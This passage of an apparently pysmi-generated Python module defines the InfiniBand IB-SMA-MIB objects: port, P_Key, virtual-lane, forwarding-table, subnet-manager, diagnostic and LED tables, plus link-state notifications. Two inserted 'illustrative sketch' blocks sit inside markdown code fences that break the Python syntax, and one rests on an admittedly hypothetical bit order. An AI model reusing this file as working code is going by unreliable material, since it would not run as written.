ibSmaPortNumGuid = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 37), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortNumGuid.setStatus('current')
ibSmaPortSubnetTimeout = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 38), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 31))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortSubnetTimeout.setStatus('current')
ibSmaPortResponseTimeValue = MibScalar((1, 3, 6, 1, 3, 117, 3, 1, 4, 39), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 31))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortResponseTimeValue.setStatus('current')
ibSmaDataPortInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 5))
ibSmaPortInfoTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 5, 1), )
if mibBuilder.loadTexts: ibSmaPortInfoTable.setStatus('current')
ibSmaPortInfoEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaPortIndex"))
if mibBuilder.loadTexts: ibSmaPortInfoEntry.setStatus('current')
ibSmaPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 1), IbDataPort())
if mibBuilder.loadTexts: ibSmaPortIndex.setStatus('current')
ibSmaPortLinkWidthEnabled = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9))).clone(namedValues=NamedValues(("oneX", 1), ("fourX", 2), ("oneXOr4X", 3), ("twelveX", 4), ("oneXOr12X", 5), ("fourXOr12X", 6), ("oneX4XOr12X", 7), ("linkWidthSupported", 8), ("other", 9)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkWidthEnabled.setStatus('current')
ibSmaPortLinkWidthSupported = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("oneX", 1), ("oneXOr4X", 2), ("oneX4XOr12X", 3), ("other", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkWidthSupported.setStatus('current')
ibSmaPortLinkWidthActive = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("oneX", 1), ("fourX", 2), ("twelveX", 3), ("other", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkWidthActive.setStatus('current')
ibSmaPortLinkSpeedSupported = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("twoPoint5Gbps", 1), ("other", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkSpeedSupported.setStatus('current')
ibSmaPortLinkState = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("down", 1), ("init", 2), ("armed", 3), ("active", 4), ("other", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkState.setStatus('current')
ibSmaPortPhysState = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7))).clone(namedValues=NamedValues(("sleep", 1), ("polling", 2), ("disabled", 3), ("portConfigTraining", 4), ("linkUp", 5), ("linkErrorRecovery", 6), ("other", 7)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortPhysState.setStatus('current')
ibSmaPortLinkDownDefaultState = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("sleep", 1), ("polling", 2), ("other", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkDownDefaultState.setStatus('current')
ibSmaPortLidMaskCount = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 9), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLidMaskCount.setStatus('current')
ibSmaPortLinkSpeedActive = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("twoPoint5Gbps", 1), ("other", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkSpeedActive.setStatus('current')
ibSmaPortLinkSpeedEnabled = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("twoPoint5Gbps", 1), ("linkSpeedSupported", 2), ("other", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLinkSpeedEnabled.setStatus('current')
ibSmaPortNeighborMtu = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("mtu256", 1), ("mtu512", 2), ("mtu1024", 3), ("mtu2048", 4), ("mtu4096", 5), ("other", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortNeighborMtu.setStatus('current')
ibSmaPortVirtLaneSupport = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 13), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("vl0", 1), ("vl0ToVl1", 2), ("vl0ToVl3", 3), ("vl0ToVl7", 4), ("vl0ToVl14", 5), ("other", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVirtLaneSupport.setStatus('current')
ibSmaPortVlHighPriorityLimit = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 14), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVlHighPriorityLimit.setStatus('current')
ibSmaPortVlArbHighCapacity = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 15), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVlArbHighCapacity.setStatus('current')
ibSmaPortVlArbLowCapacity = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 16), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVlArbLowCapacity.setStatus('current')
ibSmaPortMtuCapacity = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 17), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("mtu256", 1), ("mtu512", 2), ("mtu1024", 3), ("mtu2048", 4), ("mtu4096", 5), ("other", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortMtuCapacity.setStatus('current')
ibSmaPortVlStallCount = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 18), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVlStallCount.setStatus('current')
ibSmaPortHeadOfQueueLife = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 19), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 20))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortHeadOfQueueLife.setStatus('current')
ibSmaPortOperationalVls = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 20), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("vl0", 1), ("vl0ToVl1", 2), ("vl0ToVl3", 3), ("vl0ToVl7", 4), ("vl0ToVl14", 5), ("other", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortOperationalVls.setStatus('current')
ibSmaPortPartEnforceInbound = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 21), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortPartEnforceInbound.setStatus('current')
ibSmaPortPartEnforceOutbound = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 22), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortPartEnforceOutbound.setStatus('current')
ibSmaPortFilterRawPktInbound = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 23), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortFilterRawPktInbound.setStatus('current')
ibSmaPortFilterRawPktOutbound = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 24), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortFilterRawPktOutbound.setStatus('current')
ibSmaPortLocalPhysErrorThreshold = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 25), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortLocalPhysErrorThreshold.setStatus('current')
ibSmaPortOverrunErrorThreshold = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 5, 1, 1, 26), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortOverrunErrorThreshold.setStatus('current')
ibSmaPKeyInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 6))
ibSmaPKeyTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 6, 1), )
if mibBuilder.loadTexts: ibSmaPKeyTable.setStatus('current')
ibSmaPKeyEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 6, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaPKeyIBAPortIndex"), (0, "IB-SMA-MIB", "ibSmaPKeyIndex"))
if mibBuilder.loadTexts: ibSmaPKeyEntry.setStatus('current')
ibSmaPKeyIBAPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 6, 1, 1, 1), IbDataPortAndInvalid())
if mibBuilder.loadTexts: ibSmaPKeyIBAPortIndex.setStatus('current')
ibSmaPKeyIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 6, 1, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65504)))
if mibBuilder.loadTexts: ibSmaPKeyIndex.setStatus('current')
ibSmaPKeyMembership = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 6, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("none", 1), ("limited", 2), ("full", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPKeyMembership.setStatus('current')
ibSmaPKeyBase = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 6, 1, 1, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 65527))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPKeyBase.setStatus('current')
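# --- Illustrative sketch, not part of the pysmi-generated module: a managed-
# object instance OID is the column OID with the row's index values appended.
# ibSmaPKeyEntry is indexed by (ibSmaPKeyIBAPortIndex, ibSmaPKeyIndex); the
# index values 1 and 0 below are hypothetical examples.

```python
# Column OID of ibSmaPKeyMembership, as registered above.
PKEY_MEMBERSHIP_COLUMN = (1, 3, 6, 1, 3, 117, 3, 1, 6, 1, 1, 3)

# Append both index values (hypothetical port index 1, P_Key table position 0)
# to form the instance OID of one conceptual-row cell.
example_instance = PKEY_MEMBERSHIP_COLUMN + (1, 0)

# Every instance OID starts with its column OID.
assert example_instance[:len(PKEY_MEMBERSHIP_COLUMN)] == PKEY_MEMBERSHIP_COLUMN
```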
ibSmaSlToVlMapInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 7))
ibSmaSL2VLMapTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 7, 1), )
if mibBuilder.loadTexts: ibSmaSL2VLMapTable.setStatus('current')
ibSmaSL2VLMapEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 7, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaIBAOutPortIndex"), (0, "IB-SMA-MIB", "ibSmaIBAInPortIndex"), (0, "IB-SMA-MIB", "ibSmaServiceLevelIndex"))
if mibBuilder.loadTexts: ibSmaSL2VLMapEntry.setStatus('current')
ibSmaIBAOutPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 7, 1, 1, 1), IbDataPortAndInvalid())
if mibBuilder.loadTexts: ibSmaIBAOutPortIndex.setStatus('current')
ibSmaIBAInPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 7, 1, 1, 2), IbDataPortAndInvalid())
if mibBuilder.loadTexts: ibSmaIBAInPortIndex.setStatus('current')
ibSmaServiceLevelIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 7, 1, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 15)))
if mibBuilder.loadTexts: ibSmaServiceLevelIndex.setStatus('current')
ibSmaVirtualLane = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 7, 1, 1, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaVirtualLane.setStatus('current')
ibSmaVLArbitInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 8))
ibSmaHiPriVlArbTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 8, 1), )
if mibBuilder.loadTexts: ibSmaHiPriVlArbTable.setStatus('current')
ibSmaHiPriVlArbEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 8, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaHiPriIBAPortIndex"), (0, "IB-SMA-MIB", "ibSmaHiPriNIndex"))
if mibBuilder.loadTexts: ibSmaHiPriVlArbEntry.setStatus('current')
ibSmaHiPriIBAPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 1, 1, 1), IbDataPort())
if mibBuilder.loadTexts: ibSmaHiPriIBAPortIndex.setStatus('current')
ibSmaHiPriNIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 1, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 64)))
if mibBuilder.loadTexts: ibSmaHiPriNIndex.setStatus('current')
ibSmaHiPriVirtLane = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 1, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 14))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaHiPriVirtLane.setStatus('current')
ibSmaHiPriWeight = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 1, 1, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaHiPriWeight.setStatus('current')
ibSmaLowPriVlArbTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 8, 2), )
if mibBuilder.loadTexts: ibSmaLowPriVlArbTable.setStatus('current')
ibSmaLowPriVlArbEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 8, 2, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaLowPriIBAPortIndex"), (0, "IB-SMA-MIB", "ibSmaLowPriNIndex"))
if mibBuilder.loadTexts: ibSmaLowPriVlArbEntry.setStatus('current')
ibSmaLowPriIBAPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 2, 1, 1), IbDataPort())
if mibBuilder.loadTexts: ibSmaLowPriIBAPortIndex.setStatus('current')
ibSmaLowPriNIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 2, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 64)))
if mibBuilder.loadTexts: ibSmaLowPriNIndex.setStatus('current')
ibSmaLowPriVirtLane = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 2, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 14))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaLowPriVirtLane.setStatus('current')
ibSmaLowPriWeight = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 2, 1, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaLowPriWeight.setStatus('current')
ibSmaLFTInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 9))
ibSmaLinForTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 9, 1), )
if mibBuilder.loadTexts: ibSmaLinForTable.setStatus('current')
ibSmaLinForEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 9, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaLinDestDLIDIndex"))
if mibBuilder.loadTexts: ibSmaLinForEntry.setStatus('current')
ibSmaLinDestDLIDIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 9, 1, 1, 1), IbUnicastLid())
if mibBuilder.loadTexts: ibSmaLinDestDLIDIndex.setStatus('current')
ibSmaLinForwEgressPort = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 9, 1, 1, 2), IbDataPortAndInvalid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaLinForwEgressPort.setStatus('current')
ibSmaRFTInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 10))
ibSmaRandomForwardingTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 10, 1), )
if mibBuilder.loadTexts: ibSmaRandomForwardingTable.setStatus('current')
ibSmaRandomForwardingEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 10, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaRandomForwardingPortIndex"))
if mibBuilder.loadTexts: ibSmaRandomForwardingEntry.setStatus('current')
ibSmaRandomForwardingPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 10, 1, 1, 1), IbDataPort())
if mibBuilder.loadTexts: ibSmaRandomForwardingPortIndex.setStatus('current')
ibSmaRandomDestLID = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 10, 1, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 49152))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaRandomDestLID.setStatus('current')
ibSmaRandomForwEgressPort = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 10, 1, 1, 3), IbDataPort()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaRandomForwEgressPort.setStatus('current')
ibSmaRandomLMC = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 10, 1, 1, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaRandomLMC.setStatus('current')
ibSmaRandomIsValid = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 10, 1, 1, 5), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaRandomIsValid.setStatus('current')
ibSmaMFTInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 11))
ibSmaMulForTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 11, 1), )
if mibBuilder.loadTexts: ibSmaMulForTable.setStatus('current')
ibSmaMulForEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 11, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaMulDestDLIDIndex"))
if mibBuilder.loadTexts: ibSmaMulForEntry.setStatus('current')
ibSmaMulDestDLIDIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 11, 1, 1, 1), IbMulticastLid())
if mibBuilder.loadTexts: ibSmaMulDestDLIDIndex.setStatus('current')
ibSmaMulForwMask = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 11, 1, 1, 2), IbSmPortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaMulForwMask.setStatus('current')
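# --- Illustrative sketch, not part of the pysmi-generated module:
# ibSmaMulForwMask is an IbSmPortList, i.e. an octet-string port bitmap. The
# decoder below assumes bit 0 of the first octet is port 0 and bit numbers
# increase with port number; the real IbSmPortList textual convention may
# order bits differently, so treat this as a hypothetical encoding.

```python
def ports_from_mask(mask: bytes):
    """Return the port numbers whose bit is set in a port-bitmap octet string.

    Assumes little-endian bit numbering within each octet (an illustrative
    convention, not necessarily the one mandated by IbSmPortList).
    """
    ports = []
    for byte_index, byte in enumerate(mask):
        for bit in range(8):
            if byte & (1 << bit):
                ports.append(byte_index * 8 + bit)
    return ports
```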
ibSmaSMInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 12))
ibSmaSubMgrInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 12, 1))
ibSmaSmInfoTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1), )
if mibBuilder.loadTexts: ibSmaSmInfoTable.setStatus('current')
ibSmaSmInfoEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaSmInfoPortIndex"))
if mibBuilder.loadTexts: ibSmaSmInfoEntry.setStatus('current')
ibSmaSmInfoPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1, 1, 1), IbDataPort())
if mibBuilder.loadTexts: ibSmaSmInfoPortIndex.setStatus('current')
ibSmaSmGuid = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1, 1, 2), IbGuid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSmGuid.setStatus('current')
ibSmaSmSmKey = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(8, 8)).setFixedLength(8)).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSmSmKey.setStatus('current')
ibSmaSmSmpCount = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSmSmpCount.setStatus('current')
ibSmaSmPriority = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1, 1, 5), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSmPriority.setStatus('current')
ibSmaSmState = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("notActive", 1), ("discovering", 2), ("standby", 3), ("master", 4), ("unknown", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSmState.setStatus('current')
ibSmaVendDiagInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 13))
ibSmaVendDiagInfoTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 13, 1), )
if mibBuilder.loadTexts: ibSmaVendDiagInfoTable.setStatus('current')
ibSmaVendDiagInfoEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 13, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaVendDiagPortIndex"))
if mibBuilder.loadTexts: ibSmaVendDiagInfoEntry.setStatus('current')
ibSmaVendDiagPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 13, 1, 1, 1), IbDataPortAndInvalid())
if mibBuilder.loadTexts: ibSmaVendDiagPortIndex.setStatus('current')
ibSmaPortGenericDiagCode = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 13, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("portReady", 1), ("performingSelfTest", 2), ("initializing", 3), ("softError", 4), ("hardError", 5), ("other", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortGenericDiagCode.setStatus('current')
ibSmaPortVendorDiagCode = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 13, 1, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 2047))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVendorDiagCode.setStatus('current')
ibSmaPortVendorDiagIndexFwd = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 13, 1, 1, 4), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVendorDiagIndexFwd.setStatus('current')
ibSmaPortVendorDiagData = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 13, 1, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(124, 124)).setFixedLength(124)).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVendorDiagData.setStatus('current')
ibSmaLedInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 14))
ibSmaLedInfoTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 14, 1), )
if mibBuilder.loadTexts: ibSmaLedInfoTable.setStatus('current')
ibSmaLedInfoEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 14, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaLedIndex"))
if mibBuilder.loadTexts: ibSmaLedInfoEntry.setStatus('current')
ibSmaLedIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 14, 1, 1, 1), IbDataPort())
if mibBuilder.loadTexts: ibSmaLedIndex.setStatus('current')
ibSmaLedState = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 14, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("unknown", 1), ("on", 2), ("off", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaLedState.setStatus('current')
ibSmaNotificationPrefix = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 2, 0))
ibSmaPortLinkStateChange = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 1)).setObjects(("IB-SMA-MIB", "ibSmaNodeLid"))
if mibBuilder.loadTexts: ibSmaPortLinkStateChange.setStatus('current')
ibSmaLinkIntegrityThresReached = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 2)).setObjects(("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodePortNum"))
if mibBuilder.loadTexts: ibSmaLinkIntegrityThresReached.setStatus('current')
ibSmaExcessBuffOverrunThres = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 3)).setObjects(("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodePortNum"))
if mibBuilder.loadTexts: ibSmaExcessBuffOverrunThres.setStatus('current')
ibSmaFlowCntrlUpdateTimerExpire = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 4)).setObjects(("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodePortNum"))
if mibBuilder.loadTexts: ibSmaFlowCntrlUpdateTimerExpire.setStatus('current')
ibSmaCapabilityMaskModified = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 5)).setObjects(("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodeCapMask"))
if mibBuilder.loadTexts: ibSmaCapabilityMaskModified.setStatus('current')
ibSmaSysImageGuidModified = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 6)).setObjects(("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaSystemImageGuid"))
if mibBuilder.loadTexts: ibSmaSysImageGuidModified.setStatus('current')
